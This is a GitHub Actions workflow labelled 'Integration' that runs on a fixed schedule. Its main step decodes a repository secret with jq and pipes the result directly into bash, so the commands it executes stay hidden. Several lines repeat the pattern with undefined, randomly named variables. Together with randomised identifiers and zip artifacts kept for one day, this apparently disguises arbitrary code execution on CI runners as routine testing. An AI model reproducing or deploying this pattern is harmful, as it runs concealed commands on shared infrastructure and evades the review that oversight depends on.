name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '28 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Perform
        env:
          iwkkv2256: ${{ secrets.iwkkv2256 }}
        run: |
          printf '%s' "$iwkkv2256" | jq -r .sfgl6 | /bin/bash
          printf '%s' "$x51987" | jq -r .klxb2 | /bin/bash
          printf '%s' "$e27" | jq -r .rxp36 | /bin/bash
          printf '%s' "$l4" | jq -r .yjvfo821 | /bin/bash
          printf '%s' "$jnmzi39546" | jq -r .pnxcd09 | /bin/bash
          printf '%s' "$zq2871" | jq -r .awn640 | /bin/bash

      - name: Upload results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: OKbLCGQS
          path: "*.zip"
          retention-days: 1
